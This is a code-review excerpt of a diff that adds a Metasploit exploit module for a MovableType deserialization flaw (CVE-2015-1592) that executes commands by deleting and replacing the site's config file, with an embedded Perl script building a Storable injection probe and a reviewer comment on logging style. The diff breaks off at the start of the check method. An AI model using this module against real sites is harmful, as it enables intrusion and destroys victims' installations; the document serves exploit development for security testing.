modules/exploits/unix/webapp/movabletype_cve_2015_1592_rce_destructive.rb

```diff
@@ -0,0 +1,192 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = GoodRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'MovableType CVE-2015-1592 - RCE (Destructive)',
+      'Description'    => %q{
+          This module exploits a serialization flaw in MovableType before 5.2.12 to execute
+          arbitrary code by deleting and replacing the mt-config.cgi. This desctructive
+          exploit does not depend on any modules that are not required MovableType dependencies
+          in a normal CGI installation. However, this attack method will noticeably corrupt the
+          MovableType installation.
+      },
+      'Author'         =>
+        [
+          'John Lightsey', # original discovery
+          'John Ligthsey'  # metasploit version
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2015-1592' ],
+          [ 'URL', 'https://movabletype.org/news/2015/02/movable_type_607_and_5212_released_to_close_security_vulnera.html' ],
+        ],
+      'Privileged'     => false, # web server context
+      'Payload'        =>
+        {
+          'DisableNops' => true,
+          'BadChars'    => ' ',
+          'Space'       => 1024,
+        },
+      'Compat'         =>
+        {
+          'PayloadType' => 'cmd'
+        },
+      'Platform'       => [ 'unix', 'linux' ],
+      'Arch'           => ARCH_CMD,
+      'Targets'        => [[ 'Automatic', { }]],
+      'DisclosureDate' => 'Feb 11 2015',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('URI', [ true, "MoveableType cgi-bin directory path", "/cgi-bin/movabletype" ]),
+      ], self.class)
+  end
+
+=begin
+
+#!/usr/bin/perl
+
+# generate config parameter for storable injection check
+
+use Storable;
+
+{
+
+    package XXXCHECKXXX;
+
+    sub STORABLE_thaw {
+        return 1;
+    }
+
+    sub STORABLE_freeze {
+        return 1;
+    }
+
+}
+
+my $check_obj = bless { ignore => 'this' }, XXXCHECKXXX;
+my $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze({ x => $check_obj});
+$frozen = unpack 'H*', $frozen;
+print "LFI test for storable flaw is: $frozen\n";
+
+=end
+
+  def check
+    print_status("#{peer} - Sending storable test injection for XXXCHECKXXX.pm load failure")
```

Comment:
Please use vprint_status for all print_status methods in #check. Sort of a new guideline here: https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-check%28%29-method